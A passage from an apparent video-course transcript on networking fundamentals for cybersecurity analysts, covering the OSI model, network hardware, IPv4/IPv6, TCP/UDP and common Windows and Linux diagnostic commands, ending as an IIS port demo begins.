Cybersecurity - Intermediate
Cybersecurity - Intermediate
Table of Contents
In this video, you will learn how to map network hardware and software to the OSI model.
Objectives
[Topic title: The OSI Model. The presenter is Dan Lachance.] In this video, I'll talk about the OSI model. OSI
stands for Open Systems Interconnect. This layered model is used to map communications technologies to a
common framework that's accepted internationally. Hardware such as network interface cards, router,
switches, and telephony equipment can easily be mapped to layers of the OSI model as can software including
all of the protocols within the IPv4 and IPv6 suites. One way to easily remember the layers in the OSI model
starting from Layer 7 – the application layer – is the mnemonic "All People Seem To Need Data Processing"
where each letter stands for the first letter of the layer of the OSI model. Layer 7 is application, Layer 6 is
presentation, Layer 5 is session, Layer 4 is transport, Layer 3 is network, Layer 2 is data-link, and finally Layer
1 of the OSI model is physical.
Let's dive into each of these in a bit more detail. Layer 1 of the OSI model is the physical layer. It's concerned
with the electrical specifications and cables, connectors and various wireless communication specifications.
Layer 2 of the OSI model is called the data-link layer. Its purpose is to deal with accessing the network
transmission medium such as trying to make a connection and transmitting data on an Ethernet or a Token
Ring network. The data-link layer or Layer 2 also deals with Media Access Control or MAC addresses. These
are also called Layer-2 addresses, hardware addresses, or in some cases, physical addresses. But it all means
the same thing. It's a 48-bit hexadecimal unique identifier for network interface such as we see here. [For
example: 90-48-9A-11-BD-6F.]
The network layer – Layer 3 of the OSI model – deals with IP, the Internet Protocol. It's also responsible for
dealing with the routing of packets to remote networks and the sharing of routing tables between routing
equipment. The IP address is also called a Layer-3 address. With IPv4, it's a 32-bit address such as
199.126.129.77. But, with IPv6, it's much longer, specifically four times longer – 128 bits long. And it's
expressed in hexadecimal. And each segment or each 16 bits is separated with a colon as we see in the example
listed here. [The example is: FE80::883B:CED4:63F3:F297.] Now, when you see a double colon side by side
like we see here, it means we've got a series of zeros in there.
Layer 4 of the OSI model is the transport layer. It's concerned with the end-to-end transmission of packets.
And so protocols like TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) mapped to
Layer 4. TCP ensures that packets are received by a target. So it's a very careful protocol. UDP is the polar
opposite. It doesn't guarantee the packets are being received by the target. It simply sends them out with the
best effort. The port address identifies a running network service that clients can connect to. So a Layer-4
address is a port address. So, for example, web servers listen on TCP port 80 and DNS servers listen on UDP
port 53 for client connections.
Layer 5 of the OSI model is the session layer. It deals with communication session creation, maintenance, and
tear down. But it doesn't imply that users are logging into something. This can happen internally within the
software without the user even knowing a session is being established. This is often used by network
programmers to initiate a call to a function on a remote network host using what are commonly called RPCs –
remote procedure calls. The session layer also deals with things like half-duplex communication, where we
have communication being transmitted in one direction at a time as opposed to full duplex, which is
bidirectional simultaneous communications where, for instance, we could send and receive at the exact same
time.
Layer 6 of the OSI model is the presentation layer. Its concern is with how data is presented between
communicating hosts. So there are differing character sets that we might be dealing with. We might have
encryption and decryption that have to be dealt with depending on whether we're using a secured transmission
or not. There is also compression and decompression that can be dealt with. Then all of these things occur at
the presentation layer of the OSI model.
Layer 7 – the highest level – is application layer. This is where higher-level protocols function such as HTTP
(the Hypertext Transfer Protocol) or SSH (Secure Shell) to name just a few. However, the application layer
doesn't necessarily imply that it has to involve user interaction, for instance, to run an application. So the OSI
model then is a conceptual model that we use to map network hardware and software to a common framework
that is accepted internationally. In this video, we discussed the OSI model.
In this video, find out how to identify when to use specific network hardware.
Objectives
[Topic title: Network Hardware. The presenter is Dan Lachance.] Being a cybersecurity analyst means
understanding not only the details about communication software, but also the underlying hardware that makes
it happen. In this video, we'll talk about network hardware. Network hardware begins with cables such as
copper wires. Now copper wire cabling is used to transmit electronical signals down the copper wires.
Commonly, we will see unshielded twisted pair or UTP and shielded twisted pair – STP – cables. Shielded
twisted pair cables are less susceptible to external interference as signals travel down the copper wires. Copper
wires are also susceptible, potentially to wiretapping, which allows other individuals to capture the signals that
are being transmitted.
Now compare that to fiber optic cabling, which transmits pulses of light instead of electricity. This happens
over glass or plastic fibers. And it's much more difficult to intercept signals than it would be with wiretapping
on copper wire-based cables. The network interface card is another piece of hardware that exists in
communicating devices. It's called a Layer-2 device. It might be a wired NIC. So, for example, server
hardware physically might have three or four NICs or we might have a Wi-Fi NIC built into a laptop or a
smartphone, same goes for Bluetooth. Either way, if it receives and transmits on a network, it's a network
interface card. Network interface cards have a hardware or MAC address, which is called a Layer-2
address. [MAC address is also called a hardware address and a physical address.]
Now this is the 48-bit hexadecimal unique identifier [For example: 90-48-9A-11-BD-6F.] for a network
interface on the local area network only. The MAC address can also be spoofed so a malicious user could use
freely available software to make their device look like some other valid device that is a trusted MAC address.
NICs also support multihoming in a device where there is more than one NIC. And we'll often see this in
firewall devices. NIC teaming allows us to put multiple network cards working together for the purposes of
either load balancing or aggregated bandwidth. The other way we can look at this is even a single network
interface card could have multiple IP addresses. And you might find that happening if you've got, for instance,
a web server hosting multiple different web sites each on a different IP address.
So each network interface card can also have different network traffic rules applied that controls what traffic is
allowed in through that card or out through the card. And that's especially relevant in multihoming firewall
devices. Routers have at least two NICs if not more, so they can take traffic in from one interface and route it
to a network through a different interface. Layer-2 and Layer-3 switches supersede hubs. They are the central
connectivity point in a star-wired network. And they are very common. Managed switches are managed
usually over a secure protocol such as HTTPS or SSH as opposed to HTTP or Telnet, which are not considered
secure for transmission of credentials. A managed switch is called managed because you can remotely manage
it and configure and tweak how the ports behave and so on. Lower end or cheaper switches will still function
as a central connectivity point. But you can't really configure them in any way because they wouldn't be
managed.
We can also configure a monitoring port on a switch so that we can capture network traffic. Now the nature of
a switch is that any traffic sent between two nodes is only seen by those nodes and not every other port in the
switch. So, if we want to capture all network traffic in a switch, we usually put our device into – let's say – port
1 of a switch, configure port monitoring for all the other ports so that it copies all the packets to port 1 where
we're running our packet capturing tool or software. Within a switch, we can configure a VLAN – a virtual
local area network. This allows for network's traffic segmentation. It also allows us to do this for the purposes
of performance. Having smaller networks as opposed to one big one is much more efficient. Also for security,
we might, for instance, want storage area network traffic in the form of iSCSI to occur on a separate VLAN
from regular user traffic.
All ports on a switch are in a single VLAN by default. But, of course, this can be changed on a managed
switch. VLAN membership can be determined by the physical port that a cable is plugged into on the switch or
it could even be the IP address of the plugin device and so on. A router is a Layer-3 device. And it's a crucial
part of network hardware that sends traffic from one network to another. Without routers, the Internet could
not exist. Routers have at least two network interfaces. They do not forward network broadcasts. And the
reason for this is due to security and performance.
Routers can be configured with packet filtering rules. In this way, they're considered a Layer-4 type of firewall
because they can block up to and including the port address for a network service. Of course, they can also
allow or deny traffic based on IP address and things like that. Routers need to be configured with the correct IP
addressing in order to router traffic correctly. Network devices point to the router interface on their subnet as
the default gateway. And that's how a device on a network can communicate outside of the local area network.
Routers maintain their own routing tables in memory. So routers have memory just like a regular PC. And a
routing table lists the best way to transmit packets to a remote network. So the routing table contains things
like network addresses. There could be multiple routes to the same location but with different efficiencies.
We can also allocate – or it might automatically be determined – the routing cost. The routing cost is used to
determine which path we should take when we have multiple paths to the same destination. Routers also share
routing information with other routers using routing protocols, such as RIP – the Routing Information
Protocol; OSPF – Open Shortest Path First; and BGP – the Border Gateway Protocol. Routers are ideally
managed over the network by administrators via HTTPS or SSH as opposed to the insecure counterparts of
HTTP or Telnet.
In our diagram, we see two routers – router 0 and router 1. [The Routing Diagram is displayed on the screen.
It shows router0 interconnected to host0, host1, and router1. The router1 is further interconnected to host2
and host3.] Now, if we take a look at our diagram in the upper left, we've got host0 and then bottom left, we've
got host1. Now, in order for those devices to send traffic through router0 – if they're on the same local area
network – they need to point to the network interface for router0 on their local subnet. Now router0 would then
be connected in some way to router1. And sometimes the connection between routers is called a backbone. So
then the traffic could be routed to router 1. Now, in the same way, in our diagram, the devices over on the right
hosts – host2 and host3 – would have to point to the IP address of the network interface for router1 on their
local area network. So the theme here is that you can't point to a router interface that's not on your local area
network because how would you get to it in the first place because that's the purpose of the router or as it's
called in IP networks, the default gateway.
Wireless access points in routers are considered Layer-2 and Layer-3 devices. This is because they deal with
not only IP addresses – Layer-3 addresses – but also MAC addresses, Layer 2. Wireless access points in
routers allow wireless connectivity for Wi-Fi networking, Bluetooth, and they also create a wireless local area
network or WLAN. They often have a wired connection to network infrastructure. And they're ideally
managed like network equipment should be over a secure protocol such as HTTPS or SSH. Other network
equipment that we might encounter include appliances of various types like hardware encryption and
decryption devices, Voice over IP, and telephony integration devices, which should be placed on a separate
VLAN for performance and security reasons. We might also have hardware firewalls, hardware VPNs, and
also different types of computing appliances in manufacturing and industrial environments. In this video, we
discussed network hardware.
[Topic title: IPv4. The presenter is Dan Lachance.] In this video, I'll talk about IPv4. IPv4 or Internet Protocol
version 4 is what's in use on the Internet today as a communication software protocol. It's also widely used on
internal enterprise networks. And it stems from the 1970s. However, IPv4 was not designed initially with
security in mind. So any application-specific transmission security has been an afterthought since the 70s such
as HTTPS to secure an HTTP web server. However, HTTPS is specific to the web server. So, if we wanted to
secure 20 web servers, we would have 20 configurations to go through. Alternatively, with IPv4 we can use
IPsec – IP security, which is not application specific.
So, for example, if we enabled IPsec on all of our internal clients and servers, then what it means is –
regardless of which transmission protocol is being used – everything would be encrypted and potentially even
digitally signed. IP addresses are 32 bits long, for example 199.126.129.77. So they're expressed in decimal
form or base 10 where each eight bits or byte is separated with a dot. The subnet mask determines which part
of the IP address identifies the network versus the host. And the subnet mask is expressed again either in
decimal (base 10) form or insider form. So, in our example, where we have an IP address of 199.126.129.77, if
our subnet mask happens to be 255.255.255.0 that means that the first three bytes identify the network. And, in
this case, that means the network is 199.126.129. So the last number 77 then would be a host on the network.
Now, with the 255s, that is the subnet mask being expressed in decimal form. In short hand, it would be simply
/24, which identifies the number of binary bits within the subnet mask. There are some special IPv4 addresses
like the local loopback, which has an address of 127.0.0.1 on a device. And we use this if we're testing our
local IP stack when troubleshooting. There is also the Automatic Private IP Addresses which are called APIPA
addresses. They have a prefix of 169.254. And a device will be configured with this when it can't contact
DHCP server. Now this APIPA address is only usable to communicate with other APIPA hosts on the local
area network only. An address of 0.0.0.0 means that there is not yet an address that's been assigned to a device.
In the routing context, 0.0.0.0 means the default route.
Network broadcasts for all networks have an address of 255.255.255.255. So all of the binary bits are set to
one. [Networks broadcast are used to transmit packets to all devices on all networks.] Routers don't forward
broadcasts. Then there are three private ranges of IP addresses designed to be used internally by companies
that will not be routed by internet routers. They are the 10.0.0 range, the 172.16.0 range, and the 192.168
range. Now there are variations. So instead of 192.168.0.0/16, for example, in a home wireless network, we
might instead have 192.168.1.0 with a /24 bit subnet mask. There are additional IPv4 settings beyond the IP
address subnet mask and the special addresses to keep in mind. The default gateway is the IP address of a
router interface on your network that you use to communicate outside of the LAN.
There could be multiple default gateways on a single LAN. And you could send traffic through them
depending on where the destination is. Now one of the dangers with routers and default gateways is ARP cache
poisoning. If a malicious user can get on the network, then they could set up a malicious host that sends out a
periodic update to every device on the network claiming to be the router. In other words, basically, telling
everyone update the MAC address that you have stored in memory for the router with my MAC address. Now
that's fine. But what it means is that all the traffic then gets routed through the malicious host, which the host
would then probably continue sending it through the Internet. The bad part is that all traffic would be seen by
the malicious user.
For example, here I'm going to type ipconfig in a Windows command prompt. Now, for my network interface,
what I want do is take a look at the default gateway. So here I see a default gateway address for my Wi-Fi
adapter. And the address is 192.168.1.1. If I clear the screen and then type arp -a, it shows me the ARP cache
and memory on my client station, which basically shows me the physical MAC addresses for devices on my
LAN and the corresponding IPs. Now I can see here I've got an entry for 192.168.1.1 along with the physical
or MAC address of my router. So ARP cache poisoning sends out an update that changes this physical address
for the default gateway. Essentially, tricking machines into sending traffic that's destined for the default
gateway to the malicious host.
So it's paramount then that we protect how people get on our network in the first place. The next big IPv4
setting would be the domain name service server or DNS server or servers. It's the IP address of one or more
lookup servers. And they also do not have to be on your network like the default gateway does. It allows
connecting to a service by name which is easy to remember versus the IP address which is difficult to
remember. You should configure more than one DNS servers. So, if one fails, devices can still resolve names
to IP addresses by filling over to the next DNS server configured. One danger with DNS – and there are many
– is DNS poisoning which is also called DNS spoofing. Essentially, this redirects legitimate traffic to a
malicious host. So you can imagine, if you frequent your online banking site and a malicious user hacks into a
DNS server that you point to, they could redirect that same URL – that friendly name you used to typing in –
to the IP address of a web server under their control that looks like the real website but isn't. And it will be
used to gather your online banking credentials.
IPv4 port address translation allows Internet access through a single public IP address on the PAT router. It
also hides internal IP addressing schemes for internal hosts going through the PAT router. And also it doesn't
allow internet initiated connections from the Internet to internal hosts. Pictured in our diagram, we see three
hosts on the inside network with addresses such as 10.0.0.1, 10.0.0.2, and 10.0.0.3. They would be configured
to point to their default gateway, which is just a router, which in turn is configured with port address
translation. Now that gets them out to the Internet. Now what's interesting about this is a PAT router has a
memory table where it tracks the inside local address, so the internal addresses as well as an inside global.
Now the inside global would use the public IP address of the PAT router along with the unique port identifier
which we see here in the form of 1000, 1001, and 1002. So it knows how to get traffic back into a host that
requested something on the inside. In this video, we talked about IPv4.
4. Video: IPV6 (it_cscybs_01_enus_04)
After completing this video, you will be able to understand IPv6 settings.
Objectives
[Topic title: IPv6. The presenter is Dan Lachance.] In this video, I'll talk about IPv6. IPv6 is Internet Protocol
version 6. It's not as widely used currently as IPv4, which is ubiquitous everywhere on the Internet. However,
it was designed with security in mind in the form of IPsec. It was also designed with media streaming or
quality of service in mind for applications that might deal with audio, video streaming, or Voice-over-IP
transmissions over a packet-switched network. In IPv6 interestingly, there is no such thing as software
broadcasting as there is often in IPv4. IPv4 dealt with subnet broadcasts, all network broadcasts, ARP
broadcasts, DHCP discovery broadcasts, and so on. That doesn't exist with IPv6. What does exist is unicast
from one to one, which is also possible with IPv4 as our multicast. So multicast transmission goes from one
device to a group of registered listening devices on that multicast address.
In IPv6 that's used for Neighbor Solicitation messages to discover other IPv6 devices on the network. IPv6 has
something that IPv4 doesn't in the form of anycast transmissions. Now, in anycast, transmission is similar to a
multicast but the distinction is that it seeks out the nearest member of a multicast group. IPv6 addresses are
128 bits long. And they're expressed in hexadecimal. Now hexadecimal means that we've got letters A through
to F, where A is used for number 10 and F is used for number 15. Of course, we have our standard 0 through to
9 for our regular digits. [For example: FE80::883B:CED4:63F3:F297.]
Now, with IPv6 addresses, each 16 bits – we'll call that a hextet – is separated not by a period but rather by a
full colon. Seen in our example, you can use a double colon once within an IPv6 address to represent a series
of zeros, which is really the absence of a value. With IPv6, the subnet prefix length determines which portion
of the IP identifies the network versus host. So it's kind of like the subnet mask in IPv4. And it can be
expressed in CIDR form, which it normally is, such as /64 means there are 64 bits in the subnet prefix.
There are special IPv6 addresses such as ::1 which means local loopback. This is used when troubleshooting
our local IP stack. Addresses beginning with fe80 are self-assigned link-local addresses in IPv6. And this will
always exist on an IPv6 host. It allows LAN communication only, but it lets it discover nodes on that network.
Here, in a Windows command prompt, if I were to type ipconfig and I'm running Windows 10 on this station, I
would see that I've got IPv6 addresses available. For example, for my Wi-Fi adapter, I don't have any IPv6
because it's disabled for that adapter. But, if I take a look up at my connection Ethernet 3 here, I see that I've
got both a Link-Local IPv6 Address. So it begins with fe80, and that never goes away. Well, the only way it
goes away, of course, is if you turn off IPv6 entirely on your network interface.
I've also got another IPv6 Address that was manually assigned to this interface in the form of 1:2:3:4:: – which
means a series of zeros – 1. IPv6 addresses starting with ff00 are multicast packets. If the prefix is 2000, then
it's called a global unicast packet transmission, which is essentially a public IPv6 address. Other settings for
IPv6 are very similar to additional settings for IPv4 such as the default gateway. The IP address of a router on
your network allows communication outside of the LAN. And, of course, there could be multiple default
gateways. You're not limited to having only one. DNS servers play the same role in IPv6 as they do with IPv4.
They are look-up servers that do not have to be on your network. And they allow connection to services by
name, which are...you know the name is easy to remember than the IP addresses, especially with IPv6. So the
interesting thing about this, of course, is that when we build a host record in a zone in DNS, so that would be a
look-up record that has a name that maps to an IP address in IPv4 that's called an A record. In IPv6, it's called
a quad A record or A-A-A-A. In this video, we discussed IPv6.
[Topic title: TCP and UDP. The presenter is Dan Lachance.] In this video, we'll talk about TCP/IPs transport
mechanisms – TCP and UDP. TCP and UDP are protocols that apply to Layer 4 of the OSI model. Higher
level apps need some kind of a transport mechanism. And that comes in the form of either TCP or UDP.
Usually, it's determined by the software developer, but some network services will allow admins to change
whether the listening port number listens on TCP or UDP. TCP is the Transmission Control Protocol, it
establishes a session with a target before transmitting any data. It's considered connection oriented because it
sets up a three-way handshake before transmitting data. In packet number one, the initiator sends what's called
a SYN packet to the target. This means synchronize. It's used in synchronize sequence numbers, which are
used to number the transmitted packets.
Then the target will send back a SYN-ACK to acknowledge that yes, we're going to agree on our starting
sequence number. The sender or the initiator in number three then acknowledges the acknowledgement to the
original SYN packet. [That is, SYN-ACK ACK.] After this has been completed, the connection is established
and data may be transferred. However, what's interesting is that the sender will require an acknowledgement
for each and every single packet that is sent because TCP aside from being connection oriented is also a very
careful and reliable protocol. Common TCP header fields include things that we might see within an HTTPS
packet such as the source port number. Now notice, in our diagram, the source port number is 59591 that's a
pretty high-level port number, whereas the destination port number is HTTPS port 443.
What this is telling us is that this is a transmission from a client web browser to a secured web server because
secured web servers listen on port 443, but communicate back with clients on a higher-level port, in this case
59591. Now we can also see that there would be a sequence number, [The sequence number is 1453.] which is
tracked by both ends of the connection for the transmission of packets within the session. There is also the next
sequence number. [The next sequence number is 1554.] There is an acknowledgement number [The
acknowledgement number is 698.] and a checksum [The checksum number is 0x2bbf.] to ensure that what is
received is what was sent. Now, from a security perspective, it's important to know these internal workings
because a lot of malicious attacks take advantage of these. And they might use overlapping sequence numbers
to crash a host. Or, as a matter of fact, a malicious user can actually forge every item within a packet, the
payload, the headers. All of this stuff can be forged by a malicious user with freely available tools.
UDP is the User Datagram Protocol, it's another transport mechanism besides TCP. It's considered
connectionless where TCP is connection oriented. So therefore, with UDP a session is not established before
transmitting data. So, in other words, it simply sends out the traffic and hopefully gets received by the intended
recipient. There is no checking. So the sender does not require an acknowledgement for every sent packet. So,
because there is no session per se with UDP, firewalls then treat every packet as a unique connection. UDP
header fields are few compared to TCP. So, in this case, we have a DNS query packet where the source port
number is a high-numbered port. [The source port number is 57035.]
Now remember port numbers are also called Layer 4 addresses. The destination port in this example is domain
or UDP port 53. What this is telling us is that this is coming from a client device, so a higher source port
destined to a DNS server. It's some kind of a DNS query. Now we'll also see other fields such as the length of
the transmission in bytes. So, in this case, 60 and a checksum value [The checksum value is 0x5532.] to ensure
that what is received is what was sent. Now it's important that we understand common TCP and UDP port
numbers. Now you might ask why is this relevant. This is important because network scanning, which can be
conducted legitimately or by malicious users for reconnaissance, can identify services based on the listening
port number.
Now, if a malicious user scans a network and sees port 25 on TCP, they're going to know that that's SMTP and
they might probe that further to discover the type of mail server you're running and then find vulnerabilities for
it. So on TCP, port 22 is for SSH – Secure Shell – which is used as a secured remote administration command
line tool. Port 25 over TCP is for the Simple Mail Transport Protocol for transferring mail between mail
service on the Internet. TCP port 80 is for HTTP web servers, TCP 443 – secured HTTP web servers, TCP
3389 is used by Remote Desktop Protocol to remotely administer Windows hosts.
On the UDP side, we've got port 53, which is for DNS client queries going to a DNS server. And we also have
UDP ports 67 and 68 used for DHCP when a client needs to acquire an IP configuration from a centralized
DHCP server. Now there are many, many other port numbers for different network services, this is just a tiny
sampling. There is then the notion of stateful packet inspection. Stateful packet inspection devices contract
packets belonging to a TCP session, so they know that a session is established. And they don't treat each
individual packet as a separate connection as is the case with UDP. So that would be called stateless packet
inspection where the device is unaware of data transmission patterns. Now, in some cases, when you look at
firewall solutions – be they hardware or software based – it might be a stateful packet inspection device or
stateless. Ideally, we want a stateful packet inspection device that can do both. In this video, we discussed TCP
and UDP.
understand which Windows tools to use when configuring and troubleshooting TCP/IP
[Topic title: Use Common Windows TCP/IP Utilities. The presenter is Dan Lachance.] In this video, we'll take
a look at some common Windows TCP/IP utilities. Both Windows client/server operating systems include a
number of built-in tools that we can use to test and troubleshoot IP connectivity. Let's start here in a Windows
command prompt on a Windows 10 station by typing ipconfig. Here it returns my network interfaces with a bit
of information related to IP settings for each. So, for example, as I scroll down, if I look at my wireless LAN
adapter which I've called Wi-Fi, I can see my DNS Suffix name, my IPv4 Address, my Subnet Mask, and my
Default Gateway. Of course, if I were to type ipconfig /all, I would get much more information for each
network interface. Let's go back and take a look at my Wi-Fi adapter [Dan refers to the information regarding
Wireless LAN adapter Wi-Fi displayed in the output.] because now I can see the description of the type of Wi-
Fi adapter it is. I can see the Physical Address otherwise known as the MAC address for my Wi-Fi adapter. I
can also see that I've got a DHCP Server listed here along with Lease Obtained and expiry information. So of
course this is a DHCP client. [Other information regarding Wi-Fi adapter displayed in the output is: IPv4
Address, Subnet Mask, Lease Expires, and Default Gateway.]
I can also see the various DNS Servers that this station is pointing to for name resolution. So I'm going to type
cls to clear the screen. Let's take a look at a couple of other things here. Now, for DNS clients, of course, we
could type ipconfig /release to release our DNS configuration as well as our IP settings in their entirety back to
the DHCP server. And then we could type ipconfig /renew to renew it. Now sometimes you might do this if
there is some kind of a problem receiving IP settings from DHCP. I'm not going to do that here because I do
have a valid connection. But I'm going to use the ping command. I'll start by pinging an IP address. [He
executes the following command: ping 192.168.1.1.] Here of course, if I get a reply, then I know that that
device or host is up and running and replying given on that address. Bear in mind though, in this day and age,
often ICMP packets which ping users are blocked. And therefore, you may not get a ping reply.
We can also ping by name. If I type ping www.google.com, then we should see that it resolves it to an IP
address and that we're getting a reply from it. So we know DNS is working. We also know that google.com is
not blocking ICMP packets, at least not the type for echo replies. At the same time, we can also work with
IPv6 if we've got IPv6 enabled. If I were to type ping -6 and then put in www.google.com – if we've got a
record in DNS specifically a quad A record, an A-A-A-A record, for google.com – it would return the IPv6
address. Of course, we would need to have IPv6 enabled for that to be successful. But ping really tells you
whether or not you're getting a response. If you're not getting a response, you don't really know if it's the target
host, the endpoint that's not available or if it's some router in between that's a problem. And that's where the
traceroute command tracert comes in. So I type tracert let's say www. – I'll pick a different host here –
eastlink.ca. [He executes the following command: tracert www.eastlink.ca.]
The first thing I'm going to do is see it's going to give me a response as it goes through my local default
gateway. Then, for each gateway that it goes through, I'll get a separate listing here. We're starting to see this
on the screen on separate lines. So we also have three sampling for the response time going through that
gateway. And, in some cases, some of the routers will return a name. So I can identify the service provider, in
this case the Internet service provider. And, in some cases, even geographically if it's a router that's in New
York or Montréal or Vancouver and so on. So tracert then shows me how far down the line I'm getting,
whereas ping just tells me whether or not a device is responding or not. I'm just going to press Ctrl+C here to
end this traceroute operation.
Now the next command we're going to take a look at here is the netstat command. If I type netstat and press
Enter, what it's going to do is show me any local listening port numbers that I have. [The output is displayed in
a tabular format with the following column headers: Proto, Local Address, Foreign Address, and State.] So,
for example, if I'm running a web server, I would have port 80 or 443 under Local Address and any foreign
address would be connections elsewhere connected to my web server. Now the same thing is true in the
opposite direction. You noticed here, the third listing from the top here is connected to the https port on
another foreign host, [He points to the third row in the table. The entry under Proto column is TCP, the entry
under Local Address column is 192.168.1.157.54236, the entry under Foreign Address column is iz-in-
f188:https, and the entry under State column is ESTABLISHED.] in other words port 443. Of course, if I look
under the Local Address column for that third entry down, it connects back to my local machine on a higher-
level port. So we can see all of the connections that have been established in this case over TCP. Although the
netstat command has numerous command-line switches that will let you look at UDP ports and so on.
So, once again, we got to press Ctrl+C to cancel that operation. And I'm going to type cls to clear the screen.
Another important command is arp, arp is related to IP address to MAC address name resolution. It stands for
Address Resolution Protocol. I'm going to type arp -a to show all entries in the ARP cache. Now, when I do
that, I have it listed per interface. And, in the Internet Address column on the left, I see the IP address. And, in
the corresponding column to the right labeled Physical Address, I see the hardware address. The way this
works is that when you contact a device on your local area network only, it will store in memory or it will
cache the hardware or MAC address of that device so that your machine will not have to send out a broadcast
would you try to connect to an IP asking for which device owns that IP and to return the MAC address. It will
already be cached here in memory.
So, for instance, 192.168.1.1 here is my default gateway, my local router because I've gone on the Internet.
Recently I can see it's cached – the Physical or MAC Address of my default gateway here. You will not cache
the MAC Address of remote hosts on other networks. The closest you'll get to that is caching the MAC address
of your default gateway. There is also the NS look-up or name server look-up command. I'm going to type
nslookup which puts me into interactive mode. It tells me which DNS server I'm connected to, which is a
Google public DNS server. [He executes the following command: ns lookup. The following output is
displayed: Default Server: google-public-dns-a.google.com, Address: 8.8.8.8.] Now, from here, I can test or
learn about DNS records. For instance, if I were to type www.eastlink.ca, it would return an answer in terms of
the IP Address for that host. [He executes the following command: www.eastlink.ca. The following output is
displayed: Server: google-public-dns-a.google.com, Address: 8.8.8.8, Non-authoritative answer:, Name:
www.eastlink.ca, Address: 24.222.14.12.] Now that's being listed here as nonauthoritative because my Google
DNS server does not control the eastlink.ca DNS zone. At the same time, I could change the type of record I'm
looking at. I might type set type=mx to switch to MX record queries. And I might type whitehouse.gov. [He
executes the following command: set type=mx, whitehouse.gov.] Now this is going to show me any SMTP
mail servers that service e-mail address to people at whitehouse.gov. So we've got a number of very interesting
Windows utilities built into the operating system that can be used for reconnaissance, ideally for legitimate
purposes or for testing and troubleshooting of TCP/IP network issues.
After completing this video, you will be able to understand which Linux tools to use when configuring and
troubleshooting TCP/IP.
Objectives
understand which Linux tools to use when configuring and troubleshooting TCP/IP
[Topic title: Use Common Linux TCP/IP Utilities. The presenter is Dan Lachance.] In this video, we'll learn
how to use common Linux TCP/IP utilities. Much like Windows operating systems, UNIX and Linux variants
include a number of commands built into the operating system that you can use to configure TCP/IP or to
troubleshoot or check out settings related to TCP/IP. Here in Kali Linux, in the left-hand bar, I'm going to click
on the second icon to start a Terminal. [Dan opens the root@kali:~ window.] Now, here in the Terminal
where I can type commands, we're going to maximize the screen. We're going to start by typing ifconfig which
stands for interface config. Here I can see I've got two interfaces – eth0 for Ethernet 0 and my local loopback
interface. From an Ethernet 0 interface, I see things like my IPv4 and IPv6 addresses [He highlights the
following lines in the output: inet 192.168.1.151 and inet6 fe88::20c:29ff:fece:7dfd.] along with my subnet
mask. [He highlights the following line in the output: netmask 255.255.255.0.] I can also see my MAC
address, [He highlights the following line in the output: ether 00:0c:29:ce:7d:fd.] my hardware address on the
Ethernet network, and so on.
But what I'm missing here are things such as whether or not I've got a default gateway and whether or not I'm
pointing to certain DNS service for name resolution. Let's start with DNS. I'm going to type clear to clear the
screen. And I'll use the cat command to display the contents of a text file under /etc called resolve.conf. [He
executes the following command: cat /etc/resolv.conf. The following output is displayed: # Generated by
NetworkManager, search silversides.local, nameserver 8.8.8.8, nameserver 192.168.1.1.] Now this file
contains information related to the DNS servers I'm pointing to. In which case here there are two along with
my DNS domain suffix, which in this example is silversides.local. Now, at the same time, if I simply type
route, I can also see here that I've got a default gateway configured on this machine. And what you're going to
notice here is that whenever you've got a route to 0.0.0.0, that is the default route. Now of course, we could test
that all this is working, for instance, by pinging something on the Internet by name.
So maybe I'll ping www.google.com. Now, unlike Windows, it's going to keep replying if that device replies to
ICMP echo requests. So, to stop the ping replies, I could press Ctrl+C. But, just like in Windows, that only
tells me if the target device is responding or not. If it's not, I don't know where the problem lies. So I can use
the traceroute command to determine that. So I'll type traceroute – R-O-U-T-E, this is all one word – Spacebar
and I can use either an IP address or a name. Here I'm going to use a name such as www.eastlink.ca. And the
first thing I notice is it's going through in step 1 or line 1, my local default gateway. Then the next thing would
be the next router on the network that gets me to the Internet and further and further through the provider
network. So each line represents a router. Now the bottom half of the screen output here isn't responding with a
name of a router or any sampling of how many milliseconds it takes to get a response from that router.
That usually means that the routers at that level are firewalled and therefore don't reply back because
traceroute like ping also uses ICMP. Although it is a different type of transmission, but it's using ICMP as its
transport mechanism. Other important commands include netstat. For example, if I type netstat -a for all and of
course I'm going to pipe that to more so it stops after the first screen full of output. [He executes the following
command: netstat -a | more.] The first thing you see at the top here are any local listening ports. [The output is
displayed in a tabular format which shows the following details of the listening ports: Proto, Recv-Q, Send-Q,
Local Address, Foreign Address, and State.] So for example, I can see that this Linux host is listening for SSH
connections. Now I could give it command-line switches to display numeric ports because we know that SSH
of course listens on TCP port 22. So I can see that that is listening. Over in the foreign address, no one is
connected because if anyone were connected to the SSH daemon, we would see their address on a higher-level
port.
So, much like in Windows, we can see which active ports we've got locally and remotely as we are connected
to other services over the network as well using the netstat command. I'm going to press Ctrl+C to cancel the
rest of that screen output. Now we can also use the arp command here in Linux [He executes the following
command: arp.] to view information about IP address to MAC address resolution. So, for example here, there
is an entry in this list in memory on this Linux host called gateway. And it doesn't give me the IP address.
Rather, it simply gives the name of the default gateway, just gateway is what it says. And then I see the
hardware address for it. So any machines I've communicated with recently on the local area network only will
show up in this ARP listing. Finally, there are ways that we can use commands in Linux whereby we can
retrieve information about DNS or to test in fact that DNS is working. One is the dig command. If I were to
type dig www.google.com, it would return information related to DNS records. So here we can see we've got
numerous A records returned with the various IP addresses that service the www.google.com web site. We also
have the NS look-up command here in Linux named server lookup [He executes the following command:
nslookup.] much like we do in Windows where I could just type it in to enter interactive mode and then start
querying things such as www.google.com, and it returns information related to that. I would type exit to get
out of NS look-up's interactive mode. In this video, we learned how to use common Linux TCP/IP utilities.
In this video, you will learn how to configure and scan for service ports.
Objectives
[Topic title: Configure and Scan for Open Ports. The presenter is Dan Lachance.] In this video, I'll
demonstrate how to configure and how to scan for open ports. A port number in TCP/IP uniquely identifies a
service running on a host such as a web server listening on TCP port 80. Of course, communication back to a
client happens on a higher-level port. Some network services allow administrators to configure the listening
port. Let's take a look here in our Windows Server by going to the Start menu and searching for IIS. Then we
will start the Internet Information Services (IIS) Manager tool [Dan opens the Internet Information Services
(IIS) Manager window. Running along the top of the window, there is a menu bar with the following menus:
File, View, and Help. The window is divided into two sections. The first section is a navigation pane, which is
named Connections. It contains a Start Page expandable node, which further contains the following
expandable subnode: SRV2012-1 (FAKEDOMAIN\Administrator). The selection made in the first section
displays the information in the second section. The second section is divided into the following four
subsections: Recent connections, Connection tasks, Online resources, and IIS News.] where in the left-hand
navigator, I'll expand the name of our server, I'll expand Sites, and then I'll right-click on the Default Web
Site [Under the Sites suboption in the Connections pane, he selects the Default Web Site suboption. As a
